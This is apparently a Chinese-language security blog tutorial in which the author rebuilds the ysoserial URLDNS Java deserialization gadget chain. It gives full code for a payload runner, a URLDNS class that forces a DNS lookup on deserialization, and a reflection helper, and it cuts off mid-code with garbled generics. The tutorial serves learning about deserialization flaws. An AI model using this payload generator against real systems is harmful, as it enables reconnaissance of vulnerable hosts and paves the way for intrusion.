夜深了,想着还需要沉淀自己的基础能力,于是乎没有继续往CC链里爬,通过研究了一下ysoserial里的URLDNS链,决定自己尝试写一个类似却有些差别的exp,使自己的基础更加牢固一些,故有了本日这篇文章。
ysoserial里的URLDNS链我就不再多说,有兴趣的话自己可以去看下面这篇文章的分析
https://www.cnblogs.com/Gcker/p/17805397.html
主要讲一下我自己构建EXP的思绪
首先我是分3个类和一个实现接口来写的,我们首先来看一下执行类
这里我们先看一下PayloadRunner类,这个类的主要功能是能够运行实现了ObjectPayload这个接口全部的类。- import com.ObjectPayload;
- public class PayloadRunner {
- public static void run(Class<? extends ObjectPayload<?>> clazz, String[] args) throws Exception{
- ObjectPayload<?> payloadInstance = clazz.getDeclaredConstructor().newInstance();
- Object result = payloadInstance.getObject(args.length > 0 ? args[0] : "默认参数");
- System.out.println("执行和返回有效载荷:" + result);
- }
- public static void main(String[] args){
- try {
- run(URLDNS.class,args);
- }catch (Exception e){
- e.printStackTrace();
- }
- }
- }
首先我先定义了一个run方法,这里接受一个Class对象作为参数,这个Class对象代表了一个实现了ObjectPayload接口的类。这里使用了泛型通配符,表现
可以接受任何ObjectPayload的实现,通过clazz.getDeclaredConstructor().newInstance()创建了接口实现的一个新实例。这行代码使用了反射来寻找无参构造
器并创建对象,当getObject方法被调用时,传入的参数由args数组决定。假如args数组非空,传入第一个元素;假如为空,传入“默认参数”。- public static void run(Class<? extends ObjectPayload<?>> clazz, String[] args) throws Exception{
- ObjectPayload<?> payloadInstance = clazz.getDeclaredConstructor().newInstance();
- Object result = payloadInstance.getObject(args.length > 0 ? args[0] : "默认参数");
- System.out.println("执行和返回有效载荷:" + result);
- }
下面main方法这里,调用URLDNS这个类,也就是URL.class这里,这是ObjectPayload接口的一个具体实现。然后通过一个try-catch块,捕获异常。- public static void main(String[] args){
- try {
- run(URLDNS.class, args);
- } catch (Exception e) {
- e.printStackTrace();
- }
- }
解析来是URLDNS类,这里其实和ysoserial 里面定义的差不多,只做了稍微修改,整体代码如下:- import java.net.URL;
- import java.net.URLStreamHandler;
- import java.net.URLConnection;
- import java.util.HashMap;
- import com.ObjectPayload;
- public class URLDNS implements ObjectPayload<HashMap<URL,String>>{
- @Override
- public HashMap<URL,String> getObject(String url) throws Exception{
- URLStreamHandler handler = new SilentURLStreamHandler();
- HashMap<URL, String > ht = new HashMap<URL, String>();
- URL u = new URL(null,url,handler);
- ht.put(u,url);
- Reflections.setFieldValue(u,"hashCode",-1);
- return ht;
- }
- private static class SilentURLStreamHandler extends URLStreamHandler{
- @Override
- protected URLConnection openConnection(URL u){
- return null;
- }
- }
- }
首先定义了接口实现,这里的包主要是进行网络和集合的类,声明了ObjectPayload接口,指示这个类将返回一个HashMap,其中包罗
URL和字符串的映射- import java.net.URL;
- import java.net.URLStreamHandler;
- import java.net.URLConnection;
- import java.util.HashMap;
- import com.ObjectPayload;
- public class URLDNS implements ObjectPayload<HashMap<URL,String>>{
这段代码URLStreamHandler handler = new SilentURLStreamHandler();创建了SilentURLStreamHandler的实例, SilentURLStreamHandler是一
个内部类,用于在创建URL,对象时提供自定义的URLStreamHandler。这个处理器的实现通常会避免进行现实的网络毗连,了解过URLDNS链的师傅们都明白为什么这里
要避免现实网络毗连,这里就不,再说明了,可以看我之前的URLDNS链分析。通过将新创建的URL对象和原始的字符串url映射存储在HashMap中,可以在需要时检索和使
用这些数据。使用Reflections类修改URL对象的hashCode字段为-1,是为了能在URL.hashCode这里,实现DNS请求。- @Override
- public HashMap<URL,String> getObject(String url) throws Exception{
- URLStreamHandler handler = new SilentURLStreamHandler();
- HashMap<URL, String> ht = new HashMap<>();
- URL u = new URL(null, url, handler); // 创建一个URL对象,使用自定义的StreamHandler
- ht.put(u, url); // 将URL和传入的字符串url存储到HashMap中
- Reflections.setFieldValue(u, "hashCode", -1); // 修改URL对象的hashCode字段
- return ht; // 返回包含URL对象和字符串映射的HashMap
- }
我在这里定义了一个私有的SilentURLStreamHandler类,并重写了openConnection方法,通过上面实例化重写的SilentURLStreamHandler类,确保不进行任何实
际的网络毗连。- private static class SilentURLStreamHandler extends URLStreamHandler {
- @Override
- protected URLConnection openConnection(URL u) {
- return null; // 防止打开实际的网络连接
- }
- }
下面我们再来说第三个类- import java.lang.reflect.Field;
- public class Reflections {
- public static void setAccessible(Field field){
- field.setAccessible(true);//将字段声明为true,使其可以通过反射访问
- }
- public static Field getField(Class<?> clazz, String fileName) throws NoSuchFieldException{
- Field field = clazz.getDeclaredField(fileName); //获取任意类的声明字段
- setAccessible(field); //调用setAccessible方法设置字段会被访问
- return field; //返回field对象
- }
- public static void setFieldValue(Object obj, String fileName, Object value) throws Exception{
- Field field = getField(obj.getClass(), fileName);
- field.set(obj, value); //修改对象的值
- }
- }
这里setAccessible(true)是允许在进行反射代码查询和修改的时间,通过这种方式保证在正常情况可以访问私有或受保护字段。- public static void setAccessible(Field field){
- field.setAccessible(true); // 将字段的访问权限设置为可访问,无论其可见性如何
- }
getField方法,该方法通过类对象和字段名获取相应的Field对象。假如字段是私有的,这个方法会自动调用setAccessible来修改字段的访问权限,确保后续操作可
以无阻碍地进行。- public static Field getField(Class<?> clazz, String fieldName) throws NoSuchFieldException{
- Field field = clazz.getDeclaredField(fieldName); // 获取类中声明的指定名称的字段
- setAccessible(field); // 确保该字段是可访问的
- return field; // 返回这个字段对象
- }
setFieldValue方法联合了上述方法的功能,允许调用者为任何对象的任何字段设置新值,纵然是私有或受保护的字段。- public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{
- Field field = getField(obj.getClass(), fieldName); // 使用getField方法获取字段
- field.set(obj, value); // 设置对象的字段值
- }
最后是接口定义
[code]import org.reflections.Reflections;import java.lang.reflect.Modifier;import java.util.Set;import java.util.stream.Collectors;public interface ObjectPayload { T getObject(String command) throws Exception; class Utils { public static Set |
